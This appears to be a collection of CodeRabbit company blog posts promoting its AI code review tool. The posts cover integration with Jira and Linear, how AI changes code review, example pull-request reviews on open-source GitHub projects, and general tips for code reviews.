* **Engineered for product-led growth:** Early on, we realized that the best way to bring our product to a wider audience was to make it easy for developers to discover and use it. We invested heavily in a seamless onboarding experience, easy organization-wide rollouts, integration with popular platforms like GitHub & GitLab, easy-to-understand pricing, and a generous free tier. This helped us grow our user base rapidly and organically.
* **Earning love from the open-source community**: We made our paid product free for public repositories, which helped us gain a strong foothold in the open-source community.
This not only helped us build a strong brand presence but also allowed us to get valuable feedback from the community, which we used to improve our product. We strongly believe in giving back to the community and have been an active sponsor of several open-source projects that we use in our stack.

## What Lies Ahead

CodeRabbit is a fast-growing company, and we are excited about the future of bringing AI to developer workflows. The new venture funding will help us hire top talent across engineering, product, and GTM functions to help us expand our product offerings and accelerate our growth.

Ready to join us? Explore open positions on our [careers page](https://coderabbit.ai/careers) or email us at [careers@coderabbit.ai](mailto:careers@coderabbit.ai).

Not looking for a new role but want to supercharge your code reviews with AI-driven contextual feedback? Try CodeRabbit with a [free 14-day trial](https://coderabbit.ai/)!

Optimize Issue Management with CodeRabbit

Aravind Putrevu — Wed, 05 Jun 2024 00:00:00 GMT

If you’ve ever felt swamped managing software issues, you know how it can drag down your whole day. It’s frustrating to get bogged down with tracking bugs and juggling tasks when you really just want to write code. That’s exactly why you'll appreciate using an AI code reviewer like CodeRabbit. It's like having a smart assistant by your side, streamlining all those tedious issue management chores. Imagine spending less time on admin tasks and more on creative code development. CodeRabbit can transform your workflow, making your projects run smoother and your days a bit easier. If your project is using Jira or Linear, you can easily integrate it into your daily processes, optimizing issue management without a sweat. ## The role of issue management tools Software development requires three primary skills: coding, issue management, and communication. Specialized tools like Jira and Linear serve as the backbone for teams looking to streamline work and enhance productivity. They organize, track, and manage the progression of individual problems and tasks within a project. ![](https://framerusercontent.com/images/NNDfCcKeZjDHSnd7FASBOOddvM.png) ### Jira and Linear for issue tracking Jira and Linear are two of the most popular platforms for issue tracking. Jira, known for its versatility, is favored by teams for agile project management, bug tracking, and focused communication. It’s like the Swiss Army knife of project management tools. ![](https://framerusercontent.com/images/hlSjzO9aiA5MmiZRX5WEf7ycJc.png) Jira stands out due to its customizable workflows, which allow teams to tailor the tool to their specific project needs and management styles. Additionally, Jira’s extensive integration capabilities with various development tools enhance its functionality, making it an indispensable asset for comprehensive project oversight. Linear is more streamlined. Its sleek, intuitive interface makes issue tracking seem less daunting and more integrated into the daily workflow. 
Linear is designed to reduce clutter and speed up issue resolution, making it a favorite for teams that prioritize efficiency and user experience. It features a command palette tool that allows quick navigation and task management without needing to navigate through menus. It also automates prioritization of issues based on set criteria, a feature that significantly enhances productivity. ## Integrating CodeRabbit with issue management tools Integrating CodeRabbit with an issue management tool is easy and takes just a few seconds. Here’s a closer look at how this integration works and why it could be a game-changer for your project management. ### How CodeRabbit integrates with Jira and Linear CodeRabbit acts as a bridge that connects your coding efforts with your project management tools. Once connected, CodeRabbit automatically syncs issues, pulling relevant tasks and linking them directly to your coding environment. It can update tickets, track progress, and manage issues so you can stay focused on writing code. CodeRabbit automatically links every commit and pull request back to specific issues or tickets. Teams get full traceability and accountability, helping them see exactly who did what, and why. It can also scan code changes to link backlogged issues that can be resolved, reducing the amount of technical debt carried by the project. Teams can prioritize work based on real-time data, allowing them to tackle the most critical issues first. In the end, they’re fixing bugs faster and making strategic decisions that align with project goals and deadlines to achieve a smoother, more efficient project lifecycle. ### Specific features of CodeRabbit that enhance issue management CodeRabbit is engineered to optimize the software development lifecycle. 
Here's how CodeRabbit specifically enhances issue management with its array of specialized features: * **AI-Driven insights:** Predicts potential bugs and suggests preemptive fixes based on best coding practices, reducing the likelihood of future issues. * **Integrated dashboard:** Provides a comprehensive overview of all ongoing issues, their current status, and assigned team members, increasing project transparency and coordination. * **Automated task handling:** Streamlines routine tasks such as issue labeling and routing, which minimizes manual labor and allows developers to concentrate on more complex challenges. ## Validating pull requests with Jira and Linear Software development involves meticulously verifying that every pull request meets coding standards and effectively addresses the underlying issue it is meant to resolve. CodeRabbit does all the heavy lifting for you. ### Validating pull requests effectively Because CodeRabbit integrates with version control platforms like GitHub and GitLab, every pull request can be linked directly to an issue or ticket. CodeRabbit also automatically checks whether the changes align with the requirements specified in the ticket. This ensures that nothing is overlooked and that all aspects of the issue have been addressed before the code is merged. ### Example workflow: Integration of CodeRabbit with Jira and Linear to validate changes Let’s say a development team is working on enhancing their web application's form handling capabilities. A developer submits a pull request that includes several updates to the `UrlEncodeMarshal` struct in their application code. Here's how CodeRabbit helps to automate and validate these changes: 1. **Assessment of pull request changes:** In the example below, the focus is on checking each update in the `UrlEncodeMarshal` struct against the GitHub issue requirements. 
While additions like the `NewDecoder` method and `FormUrlEncoded` in the `marshalerRegistry` map align well, methods like `ContentType` and `Marshal` contradict the specified need for URL-encoded form handling. ![](https://framerusercontent.com/images/9G1LTBLFHNlP2HnPOMWELza3U.png) a. Addition of `UrlEncodeMarshal` struct: CodeRabbit verifies that the new struct supports URL encoding, aligning perfectly with the GitHub issue's requirement to enhance form handling for URL-encoded forms. b. `ContentType` method in `UrlEncodeMarshal` struct: The pull request suggests this method returns `application/json`, which contradicts the requirement for URL-encoded form handling. CodeRabbit flags this as a mismatch. c. `Marshal` method in `UrlEncodeMarshal` struct: This method is found to marshal the response in JSON format, which conflicts with the requirement for URL-encoded forms. This issue is also flagged by CodeRabbit. d. `NewDecoder` method in `UrlEncodeMarshal` struct: Successfully reads the request body, parses it as form data, and populates the query parameters as required, which is a positive alignment with the issue requirements. e. Addition of `FormUrlEncoded` and `DefaultFormMarshaler` in `marshalerRegistry` map: Supports the MIME type for URL-encoded forms, aligning well with the GitHub issue's objectives. 2. **Automated feedback loop:** Once the pull request is analyzed, CodeRabbit automatically updates the linked Jira and Linear tickets with detailed feedback on each component of the pull request. This includes both the validated elements and those that require revisions, ensuring that all aspects of the issue are addressed before merging. 3. **Seamless developer interaction:** Developers receive real-time chatbot feedback directly in their coding environment, enabling quick revisions and re-submission of updated code for further validation. This tight integration cuts down on the review cycle time and enhances overall code quality. 
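The two flagged findings in the workflow above are easier to see side by side. The following is a minimal Python sketch; it is not the Go code from the pull request and not a description of how CodeRabbit works internally. The class names `JsonLikeMarshaler` and `FormMarshaler` and the helper `check_marshaler` are hypothetical, and the sketch only assumes that the issue asks for `application/x-www-form-urlencoded` output.

```python
import json
from urllib.parse import parse_qs, urlencode

# MIME type the (assumed) issue requirement asks for.
FORM_URLENCODED = "application/x-www-form-urlencoded"


class JsonLikeMarshaler:
    """Hypothetical stand-in for the flagged behaviour: meant for forms, emits JSON."""

    def content_type(self) -> str:
        return "application/json"

    def marshal(self, data: dict) -> str:
        return json.dumps(data)


class FormMarshaler:
    """Hypothetical stand-in for a marshaler that meets the requirement."""

    def content_type(self) -> str:
        return FORM_URLENCODED

    def marshal(self, data: dict) -> str:
        return urlencode(data)


def check_marshaler(marshaler) -> list[str]:
    """Return a list of mismatches between a marshaler and the form requirement."""
    findings = []
    if marshaler.content_type() != FORM_URLENCODED:
        findings.append(f"content type is {marshaler.content_type()!r}")
    sample = {"name": "Ada", "lang": "go"}
    body = marshaler.marshal(sample)
    # A URL-encoded body must parse back into the original key/value pairs.
    if parse_qs(body) != {key: [value] for key, value in sample.items()}:
        findings.append("body is not URL-encoded form data")
    return findings


if __name__ == "__main__":
    for candidate in (JsonLikeMarshaler(), FormMarshaler()):
        print(type(candidate).__name__, check_marshaler(candidate))
```

In this sketch, `check_marshaler(JsonLikeMarshaler())` reports two findings, mirroring the `ContentType` and `Marshal` mismatches, while `check_marshaler(FormMarshaler())` reports none.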
By automating the validation of pull requests against specific GitHub or GitLab issues, CodeRabbit makes sure every code change is relevant and correctly implemented. A significant side benefit is that it speeds up the development process. Integrating with Jira and Linear will extend this feature to wider issue management processes, improving project efficiency and the quality of outputs. ## Best Practices for Optimizing Issue Management Getting the most out of your issue management tools means optimizing them to work seamlessly with CodeRabbit. Here’s how you can set up these tools for peak performance and ensure your issue management process runs like a well-oiled machine. * **Direct linking:** Begin by linking CodeRabbit directly to your existing projects in Jira and Linear. This integration enables real-time syncing of issues and tasks within your development environment, ensuring that updates and changes are immediately reflected * **Training and navigation**: Keep your team well-versed in how to navigate between CodeRabbit, Jira, and Linear. Familiarity with these tools reduces friction and enhances productivity. Update your README file with clear instructions on how to work with CodeRabbit. * **Documentation and tracking guidelines:** Establish clear guidelines on how issues should be documented and tracked in Jira or Linear. Clarify how CodeRabbit complements these processes, ensuring that all team members use these tools effectively The key is to make sure every team member can use these tools to their full potential. The goal is to make your workflow as smooth as possible, transforming issue management into a proactive component of your development strategy. ### Streamlining your issue management process Managing issues effectively in software development involves a streamlined process that prevents bottlenecks and maximizes team output. Here’s how to fine-tune your process: 1. 
**Prioritizing critical issues:** Leverage CodeRabbit's AI insights to figure out which issues are the most pressing based on their impact and complexity. Prioritizing your issues speeds up resolution times and really ramps up your team's productivity 2. **Automation of checks and balances:** Use CodeRabbit's analysis features to automate routine checks and suggest preemptive fixes. Reduce the chances of small issues blowing up to keep everything running smoothly and make your software more reliable 3. **Seamless integration customization:** Set up Jira and Linear to automatically update task statuses. The process is automated and does not require manual intervention once set up. Taking a proactive approach saves time and boosts the overall quality of your projects, making sure that your team can focus on what they do best: innovating and solving complex problems. ## CodeRabbit makes issue management easier Using CodeRabbit can significantly streamline your issue management, making it quicker and more efficient to identify, track, and resolve software bugs. This enhanced management capability ensures that your development team can focus more on critical development tasks rather than getting bogged down by repetitive issue tracking. Experience the difference in your project workflow with CodeRabbit. Discover how our platform can bolster your issue management strategies and support your team in delivering higher-quality software more efficiently. Start your journey with CodeRabbit today—[Sign Up for a Free Trial](https://coderabbit.ai/)!

How AI is Transforming Traditional Code Review Practices

Aravind Putrevu — Tue, 28 May 2024 00:00:00 GMT

Code reviews are critical checkpoints when developing software. Traditionally, they’ve been done by human developers, who pore over lines of code, hunting for defects and bugs. The process ensures adherence to coding standards, promotes best practices, and levels up domain knowledge across teams. However, it’s not quick or flawless. According to [SmartBear's study of a Cisco Systems programming team](https://smartbear.com/resources/case-studies/cisco-systems-collaborator), a review of 200-400 lines of code should take about 60 to 90 minutes to achieve a 70-90% defect discovery rate. Still, it’s an incredibly valuable part of the process. Software developers almost universally consider code reviews to be important, according to a [2022 Global DevSecOps Survey](https://about.gitlab.com/developer-survey). ## Current state: Code reviews in practice Code reviews have been a staple of software development since the 1970s. Although the tools and languages have changed, the goal hasn’t. When a software developer makes a code change, they want other pairs of eyes on it to make sure the change has the intended effect without any unintentional side effects. In this way, code reviews help mitigate the risk of breaking changes. They are also a cultural practice that trains new engineers and builds team cohesion. And they are one of the few practices left that are entirely manual. Engineers must actually take the time and energy to look at the changes being made and analyze them from different perspectives. They can’t afford to take risks on security, standards compliance, or reliability issues, so the work is resource-intensive and requires skills developed over time with practice. 
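The SmartBear figures quoted at the start of this article put a rough number on that manual effort. The sketch below is back-of-the-envelope arithmetic only: it assumes review time scales linearly with the size of a change and pairs the extremes of the quoted ranges (400 lines in 60 minutes, 200 lines in 90 minutes). Both are simplifications made for this example, not claims from the study, and `review_hours` is a hypothetical helper.

```python
# Review rates implied by the quoted figures (200-400 lines in 60-90 minutes).
FASTEST_LINES_PER_HOUR = 400 / 1.0  # 400 lines in 60 minutes
SLOWEST_LINES_PER_HOUR = 200 / 1.5  # 200 lines in 90 minutes


def review_hours(lines_changed: int) -> tuple[float, float]:
    """Return (best case, worst case) review time in hours.

    Assumes review time grows linearly with the number of changed lines,
    which is an assumption of this sketch rather than a finding of the study.
    """
    best = lines_changed / FASTEST_LINES_PER_HOUR
    worst = lines_changed / SLOWEST_LINES_PER_HOUR
    return best, worst


if __name__ == "__main__":
    best, worst = review_hours(1000)
    print(f"1,000 changed lines: {best:.1f} to {worst:.1f} hours of review")
```

Under those assumptions, a 1,000-line change would call for roughly 2.5 to 7.5 hours of focused review.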
## Code review conundrums Even after years of practice, code reviews are difficult, slow, and inefficient. Roughly [45% of developers](https://blog.codacy.com/10-facts-about-code-reviews-and-quality) cite 'Lack of Time' as the primary obstacle to reviewing code, while 34% attribute it to the 'Pressure to Ship'. Everyone involved in software development, from the CEO to the project manager, has to put faith in the process in hopes that code changes don’t introduce any new problems. Yet code reviews are time-consuming, prone to oversights, and can sometimes turn into a subjective critique session rather than a constructive feedback loop. Here are a few pain points: * **Time Constraints:** Developers are often pressed for time, juggling multiple tasks and deadlines. Comprehensive code reviews either compete for this valuable time and delay timelines, or review quality suffers as shortcuts are taken to complete the work. * **Cognitive Bias and Variability:** No two developers think alike. This subjectivity can lead to inconsistent reviews, where the focus and thoroughness vary wildly based on the reviewer's preferences, expertise, and mental state. * **Error Prone:** Subtle bugs and dependency issues can be missed, especially in complex or large codebases. This can lead to vulnerabilities and technical debt being released into the wild. * **Knowledge Silos:** Technical knowledge tends to get siloed, especially in large teams. This silo effect can prevent a thorough understanding of the codebase, reducing the effectiveness of code reviews. Where there are humans doing work, there are imperfections and risks of blind spots. 
To make matters worse, spending [more than a day a week](https://blog.codacy.com/10-facts-about-code-reviews-and-quality#) reviewing code shows no correlation with improvements in perceived code quality. Nor does it correlate with more time spent shipping new features (as opposed to fixing bugs or paying back tech debt). ## The AI revolution in software development Several AI-powered tools and platforms are making waves in the software development world, such as GitHub Copilot, CodeGuru by Amazon, and DeepCode by Snyk. These tools leverage machine learning and advanced algorithms to automate processes, suggest optimizations, and even generate code snippets to address identified issues. Their adoption underscores the potential and demand for AI in enhancing code review processes. Having these tools at the fingertips of developers helps produce more resilient and sophisticated code at the point of authorship. With AI, developers can theoretically eliminate most (if not all) of the pain points they experience. AI is fast, readily available, and doesn’t have to deal with organizational politics. ## Using AI to support code reviews The most effective use of AI in software development marries its strengths with the irreplaceable intuition, creativity, and experience of human developers. This synergistic approach leverages AI for what it does best (speed, consistency, and automation) while relying on humans for strategic decision-making and nuanced understanding that AI (currently) cannot replicate. AI can now be used to address the challenges of the traditionally human-centric process of code reviews. 
For example, AI can scan entire code repositories and workflow systems to understand the context in which the codebase runs. This is a major advantage for today’s modern AI code review systems, and one that pre-genAI tools lacked. Here are a few other ways AI can help: * **Automating Tedious Tasks:** Code reviews often involve repetitive tasks, such as checking coding standards, documentation, and boilerplate code compliance. AI can automate these aspects of code reviews, freeing up human reviewers to focus on more complex and subjective aspects of the code that require human judgment and experience. This not only speeds up the review process but also reduces the cognitive load on human reviewers. * **Identify Defects Faster:** AI can tirelessly scan through thousands of lines of code in minutes, identifying logical flaws and even complex security vulnerabilities with precision that rivals or surpasses the human eye. This allows human reviewers to focus on higher-level architectural and design considerations instead of getting bogged down in finding needle-in-the-haystack type errors. * **Consistent and Objective:** AI doesn't have a bad day or get mad at a management decision (yet). It doesn't have biases towards certain coding styles or practices unless they're part of its training data. By applying uniform standards across the board, AI ensures that every line of code is reviewed with the same level of scrutiny, bringing a level of consistency that is hard to achieve in human-only reviews. * **Instantaneous Feedback:** One of the most significant advantages of AI in code reviews is the ability to analyze and provide feedback in real-time to developers. This immediacy helps identify issues within the context of discussion of the code review - rather than in later development cycle stages, thus reducing the cost and effort of fixing bugs down the line. 
* **Learning and Adaptation:** Advanced AI systems can learn from past reviews, developer corrections, and evolving coding practices. This learning capability means that AI assistants can continuously improve, offering more relevant and accurate feedback over time. * **Knowledge Sharing and Augmentation:** By integrating insights from across the codebase and external sources, AI can act as a knowledge-sharing platform, suggesting best practices, offering coding tips, and even providing examples from similar projects. This feature helps break down knowledge silos and fosters a culture of continuous learning and improvement. ## AI code reviews are transformative, not incremental The integration of AI technology into the code review process is not just an incremental improvement, but a transformative change. Current AI technology can play the role of an assistant to a software development team, accelerating and offloading tedious manual analysis and bug finding. Future advancements will see AI evolve into the role of a collaborator, capable of more complex reasoning, offering design suggestions, best practices, and even predicting or simulating the impact of code changes on software functionality and performance. AI can provide deeper insights into code quality, offer personalized feedback, and play a key role in instilling a culture of learning and improvement within development teams. The journey towards fully realizing the potential of AI in code reviews requires mindful integration and a continued partnership between human developers and their AI counterparts. The future of software development is bright, and AI is undoubtedly a leading light on this horizon. CodeRabbit is the best AI code review tool for GitHub and GitLab. Sign up and get a free trial for your team or organization.

How to Use an AI Code Reviewer on GitHub in 4 Examples

Aravind Putrevu — Mon, 27 May 2024 00:00:00 GMT

Nobody prepares you for the hard work of being an OSS project maintainer. When you’re just getting started, it’s exciting to get the word out and generate hype around your project. You start earning followers and stars on your repo, people are using your software, and momentum begins to build. But over time, things can get unwieldy. More and more people are using your code, which is great, but expectations increase. You have to start thinking differently about your work. There’s mounting pressure for new features, better performance, bug fixes, and (most importantly) security. What started as a hobby can quickly become a substantial responsibility. Maintainers of popular projects are turning to AI for help, particularly for code reviews. An AI can quickly scan through pull requests for errors and security flaws, providing some breathing room to project maintainers. It’s especially helpful for contributor PRs, acting as a proactive line of defense for maintainers’ time. Let’s review some of the most effective use cases we see emerging on some notable repos. ## High-level PR summaries and expert code walkthroughs in an instant The more popular the OSS project, the more difficult it is to track what’s actually happening with code contributions. Maintainers often need a brief summary of what’s going on with a new PR and the code changes it introduces. Let’s look at a [PR summary](https://github.com/vitwit/resolute/pull/1114#issue-2085463729) for [Vitwit](https://www.vitwit.com/), an AI and blockchain company based in Hyderabad, India. The purpose of the PR is to close a feature request for new wallet switching functionality in January 2024. As you read through the following, think about how much time and energy are saved for the maintainer: fewer clicks, lower cognitive load, and expert commentary that considers the context of the entire codebase. 
![](https://framerusercontent.com/images/4XOf98OxfgY2HrcW4ymZPQr8II.png) At a brief glance, you can see the PR contains two code commits with changes across six files. Instead of clicking through the six files and reviewing code changes, there’s a quick summary of the new features and enhancements being introduced. Further down, we can see an automated comment with a technical walkthrough of the changes. The AI explains the feature’s purpose, the required data integration, and compatibility concerns — all in plain English in a short, easy-to-read paragraph. File-level changes are summarized in a short table followed by another table that demonstrates whether the code changes actually address existing software requirements. The maintainer doesn’t need to manually review whether the feature requirements are actually addressed. Everything is spelled out in a way that can be visually skimmed for completeness. ![](https://framerusercontent.com/images/RVWRlvIkLbIuVpp5AtnfhczlpcU.png) **To compile and check for all this information would take an expert maintainer at least half an hour.** With an AI, they get it in an instant. It’s contextually aware and contains the code, the PR, all open issues, stylistic expectations, and whether there’s sufficient documentation. The maintainer can focus on the risk of merging the change and home in on where improvements can be made. ## Collaborative, interactive PR code reviews and issue tracking in real time Developer [Kevin Mesiab](https://github.com/kmesiab) built an interactive, SMS-based nudging feature in his [Equilibria engine](https://github.com/kmesiab/equilibria). For [this pull request](https://github.com/kmesiab/equilibria/pull/1), he went beyond the PR summary and code walkthrough for some interactive insights and assistance. The AI made a recommendation to add logging for database connectivity in the `PingDatabase` function. 
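As a rough illustration of the kind of change being recommended, here is a minimal Python sketch of a connectivity check that logs its outcome. It is not the code from the Equilibria repository, whose actual suggestion appears in the screenshots that follow; the function name `ping_database`, the logger name, and the use of SQLite are all assumptions made for this example.

```python
import logging
import sqlite3

# Hypothetical logger name chosen for this sketch.
logger = logging.getLogger("db")


def ping_database(conn: sqlite3.Connection) -> bool:
    """Return True if the connection answers a trivial query, logging the outcome."""
    try:
        conn.execute("SELECT 1").fetchone()
    except sqlite3.Error as exc:
        # Log the failure so connectivity problems are visible to operators.
        logger.error("database ping failed: %s", exc)
        return False
    logger.info("database ping succeeded")
    return True


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    connection = sqlite3.connect(":memory:")
    print(ping_database(connection))
    connection.close()
    print(ping_database(connection))
```

Whether logging belongs inside the function or in the caller is a design choice, which is exactly the point the maintainer raises in the exchange below.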
![](https://framerusercontent.com/images/xoJmzbEzN8UaKyp1cNHfGOsRL5E.png) You can see the suggested change in the “Committable suggestion” section below. ![](https://framerusercontent.com/images/XCS7e37YyuNLnSSACePbZBIM.png) Mesiab responds in a chat by saying logging is already handled in a different way outside of the function. The AI accepts the feedback and retains the knowledge for the future. (Imagine if every dev took feedback so kindly!) Next, the AI discovers some potential issues in the existing GET-based implementation. It offers thorough feedback and a suggested alternative. Mesiab tells the AI to file the suggestion as an issue, which it does, and then provides the link. Given that many developers are strapped for time, it’s unlikely that they’d provide such thorough analysis to the point of providing alternative implementation code. And if they did, it would take much, much longer than the instantaneous response of the AI. **Not only is Mesiab saving his own time, but he’s getting much more bang for the buck out of his code-reviewing peer.** Development time isn’t cheap, so this brief interaction saves time and money. ## Open-minded, long-term learning [Artemis](https://github.com/ls1intum/Artemis) is a popular interactive learning app with individualized feedback for learning reinforcement. Written and supported by the [Technical University of Munich](https://github.com/ls1intum), Artemis has many contributors, meaning a larger codebase with more moving parts. 
In [this chat-based interaction](https://github.com/ls1intum/Artemis/pull/8037), we can see a suggestion from the AI overruled by the maintainer: “we want to get rid of the star imports.” The AI’s response: “Understood, I’ll remember this preference for explicit imports over wildcard imports in the Artemis project for future reviews.” ![](https://framerusercontent.com/images/zntirA1uLVoGqhehu4OnIOXco.png) Then the AI shares what it’s learned and what it will update about its previous learnings: ![](https://framerusercontent.com/images/CLJjLnBcxqYOCffpofoBG7CdIXc.png) Not only can you see what the AI has learned to do (and not do) in the future, but you can clearly see that learnings can be tracked to individual PRs. Those learnings can be corrected with a simple chat-based suggestion. For example, you can say, “Please don’t use explicit imports anymore. We are switching back to wildcard imports.” ## Easily maintain project standards and requirements [OpenReplay](https://github.com/openreplay/openreplay) is a self-hosted browser session replay and analytics tool that helps devs reproduce issues with real-world customer interaction data. It’s a popular repo with more than 8,800 stars. In [this pull request](https://github.com/openreplay/openreplay/pull/1858#discussion_r1467629285), there are new features, a few areas of refactoring, and the removal of outdated code, summarized by the AI ![](https://framerusercontent.com/images/f6nXaSyrcoyFreToOgCliIx34.png) In particular, we want to highlight the “codebase verification” feature that happens near the end of the PR. ![](https://framerusercontent.com/images/irb1pl1ufsGoeSDIj9X934GKhuE.png) The AI detects a reference to an old method (GetHandler) and finds that “not all references to the method were updated following its renaming to `bGetHandler` in the `Router` struct.” Perhaps this updated function name was a typo that needed correction, or perhaps it was an intentional renaming that wasn’t consistently applied. 
In either case, this could have been a breaking change introduced into the codebase that was caught by the AI. ## Impact of AI on OSS project maintenance With an AI code reviewer, maintainers have more help than ever in keeping a clean, consistent, and functional codebase. Looking through the examples above, we can clearly see how an AI can assist developers and maintainers with summaries, walkthroughs, interactive code reviews, and consistency. We can also see how much work can be done before a PR ever gets to a maintainer. AI code reviewers can make a huge difference for open source projects by: * Identifying errors * Enforcing coding standards * Spotting security risks * Explaining code changes * Telling maintainers where to focus When it comes down to it, we’re talking about time management and expertise. As OSS projects expand, there’s more to manage in terms of contributions and complexity. Plus, with AI handling routine and repetitive tasks, project maintainers can allocate human resources to more strategic tasks such as feature development, bug fixes, and community engagement. It’s an effective strategy for any project aiming for more efficient use of volunteer time and potentially faster project development. ## How to use an AI code reviewer in your OSS projects There are a variety of AI code reviewers available [in the GitHub Marketplace](https://github.com/marketplace?category=&type=&verification=&query=ai), many of which are completely free to use. To implement one in your open source project, follow these steps: 1. **Explore options:** Look for tools on the GitHub Marketplace that best meet the specific needs of your project, such as language support, customization options, and integration capabilities. 2. **Install and configure:** Select an AI tool and install it to your repository (some require only a couple of clicks). Configure the tool according to your project’s coding standards and review processes. 
This may include setting up rules for code style, defining error checks, and specifying security protocols. 3. **Integrate into workflow:** This might be the most difficult process if you’ve got a steady workflow going in your project. Consider automatically reviewing all new pull requests or configuring it to provide periodic codebase scans. Ensure that all contributors understand how to interact with the AI and what to expect from its reviews. (Update your README.) 4. **Monitor and tweak:** As you begin to use the AI tool, monitor its performance and feedback for effectiveness and accuracy. Be open to tweaking its settings and rules based on real-world use to better fit your project’s needs. 5. **Educate your team:** Educate your team and contributors on how to make the most out of the AI code reviews. This includes understanding how to interpret the AI’s feedback, how to make corrections based on its suggestions, and how to override the AI when necessary. With AI code reviewers, project maintainers can significantly reduce the manual burden of code checks and ensure higher standards of quality and security. It saves valuable time while enhancing the overall development process. In the end, you’re making open source projects more robust and reliable. Want to get started with a completely free AI code reviewer? Try [CodeRabbit](https://github.com/marketplace/coderabbitai). Learn more at [CodeRabbit.ai](http://coderabbit.ai/).

10 Power Tips for Effective Code Reviews

Aravind Putrevu — Mon, 29 Apr 2024 00:00:00 GMT

Code reviews stand as a crucial checkpoint in software development, ensuring that the code is reliable, maintainable, and meets the set standards and best practices. They foster collaboration and knowledge sharing among developers, improving the overall code quality. ### CodeRabbit: Your Partner in Code Reviews Meet CodeRabbit, an AI-driven platform designed to revolutionize the way code reviews are conducted. It offers automated line-by-line feedback on code changes, suggesting improvements and corrections. This robust platform prioritizes security, privacy, and compliance, making it a trusted partner for over 1000 organizations worldwide. ## Understanding the Basics of Code Reviews Before delving into the power tips for effective code reviews, it is crucial to grasp the basics. Code reviews are an integral part of any development process and establishing a culture that values them is foundational. A culture that prioritizes code reviews fosters an environment of continuous learning and improvement. It encourages developers to work collectively, improving the code base while also enhancing their individual skills. The role of a tool like CodeRabbit becomes pivotal in this context. It not only facilitates the code review process but also enriches the learning environment. Another aspect that underscores the importance of code reviews is the need for regularity. Regular code reviews help in early detection of bugs and issues, saving a significant amount of time and resources in the later stages of development. This is where CodeRabbit truly shines. With its automated code review capabilities, CodeRabbit ensures that no code change goes unchecked. It makes regular code reviews seamless, effortless, and more effective. Lastly, a clear purpose is key in any code review. 
Whether [it is to improve code quality](https://coderabbit.ai/blog/code-reviews-made-easy-how-to-improve-code-quality), share knowledge among the team, or ensure adherence to coding standards, having a defined purpose for each code review makes it more focused and productive. CodeRabbit aligns with this objective, offering detailed, line-by-line feedback on code changes, thus ensuring every review serves its purpose effectively. ## The Power Tips for Effective Code Reviews As we delve into the core of effective code reviews, it is key to highlight that these tips are not just theoretical. They can be seamlessly applied through a tool like CodeRabbit. This AI-driven platform is designed to revolutionize the way code reviews are conducted, optimizing the process while ensuring high-quality results. Let's start with the first power tip: highlighting issues in the code. One of the primary objectives of code reviews is to identify and rectify issues before they become problematic. CodeRabbit aids in this process by providing line-by-line feedback on code changes, making it easier to spot and fix errors. The next tip revolves around the importance of explaining relevant principles and the need for best coding practices. A code review isn't just about finding errors; it's also about enhancing the code's efficiency and robustness. CodeRabbit takes this a step further by suggesting improvements and corrections, educating developers about best practices along the way. Patience is a virtue, and nowhere is this truer than in code reviews. The importance of patience and taking a second look in code reviews cannot be overstated. If an issue isn't clear at first glance, taking the time to look at the code again can often provide clarity. CodeRabbit's automated review system allows for easy revisits to previously reviewed code, aiding in this process. Having a second-level code reviewer can be invaluable in ensuring the quality of code reviews. 
CodeRabbit acts as a reliable second-level reviewer, providing an additional layer of review to verify code changes. Its AI-driven feedback system can often catch errors or suggest improvements that may have been overlooked in the initial review. Documenting all code review comments is essential for future reference and continuous improvement. CodeRabbit automates this process, providing a record of all comments and changes made during the review process. This documentation can then be easily accessed for future reference or training purposes. Providing specific and actionable feedback is another crucial aspect of effective code reviews. Feedback should be constructive, respectful, and aimed at improving code quality, not criticizing the coder. CodeRabbit encourages this by providing clear, objective feedback that developers can easily understand and act upon. Utilizing tools and automation for code reviews is a game-changer. CodeRabbit revolutionizes this with AI, offering automated code reviews [that improve code quality](https://coderabbit.ai/ja/blog/code-reviews-made-easy-how-to-improve-code-quality) while significantly reducing the time and effort required for manual reviews. Attention to code style, best practices, security, and error handling is another power tip for effective code reviews. CodeRabbit.ai's AI-driven platform provides comprehensive verification of code changes, ensuring adherence to these crucial aspects. Finally, the importance of a code review checklist cannot be overstated. It provides a clear framework for the review process, ensuring that no important aspect is overlooked. CodeRabbit.ai's detailed feedback and documentation system can be instrumental in implementing such a checklist, ensuring a thorough and effective review process. In conclusion, these power tips, when coupled with an innovative tool like CodeRabbit.ai, can significantly enhance the effectiveness and efficiency of your code reviews. 
## Conclusion In this post, we've covered the key power tips for effective code reviews. From the necessity of regularly reviewing code and establishing a culture of reviews, to the importance of providing specific, actionable feedback and learning from each review, these guidelines serve as a roadmap for developers striving for excellence. Throughout this discussion, the role of CodeRabbit as a game-changer in the realm of code reviews has been emphasized. Its AI-driven platform allows CodeRabbit to streamline the review process, offering automated, line-by-line feedback on code changes. This innovation not only helps [improve code quality](https://coderabbit.ai/blog/code-reviews-made-easy-how-to-improve-code-quality), but also reduces the time and effort typically associated with manual reviews. But don't just take our word for it. We encourage you to experience the transformative impact of CodeRabbit for yourself. With a 7-day free trial and flexible pricing plans, there's no better time to elevate your code review process and achieve greater code efficiency and robustness. We look forward to welcoming you to the CodeRabbit community. ## Explore CodeRabbit Today! With CodeRabbit, code reviews become a breeze. Our platform's AI-driven approach enhances code quality and efficiency, transforming how reviews are conducted.

AI Code Reviews: Boosting Dev Team Performance

Aravind Putrevu — Fri, 26 Apr 2024 00:00:00 GMT

In traditional software development, developers often review each other's code manually, a time-consuming process that involves scrutinizing each line for errors and potential improvements. Regardless of experience, it’s a daunting task. It also slows down the development cycle and places a heavy burden on team dynamics, as it can lead to subjective judgments and inconsistent feedback. AI-driven code reviews [transform this aspect of development](https://coderabbit.ai/blog/how-ai-is-transforming-traditional-code-review-practices?) by automating the review process. They analyze code quickly and objectively, identifying issues and suggesting optimizations without human bias or fatigue. It's a shift that accelerates the review process and enhances the accuracy of the feedback. Developers that embrace this new technology shift their focus from correcting to creating, fostering a culture of innovation. ## Impact of AI code reviews on software development workflows AI-driven code reviews are profoundly impacting the speed, quality, and collaborative nature of development work. It's a significant shift for developers that’s making its mark on the industry. ### Accelerated development cycles Once developers submit code, the AI code reviewer assesses it with exceptional speed, processing vast amounts of information far quicker than a human could. The result is an accelerated development cycle that enhances code quality consistency. AI maintains a uniform standard throughout the review process, unlike human reviewers, who might experience fatigue or inconsistency. By automating mundane and repetitive coding tasks, these tools free up developers to focus on more complex and impactful work. This automation leads to a significant reduction in time to market, allowing products to reach consumers faster than ever. Moreover, with AI handling the heavy lifting, productivity skyrockets, turning what used to be a marathon into a sprint. 
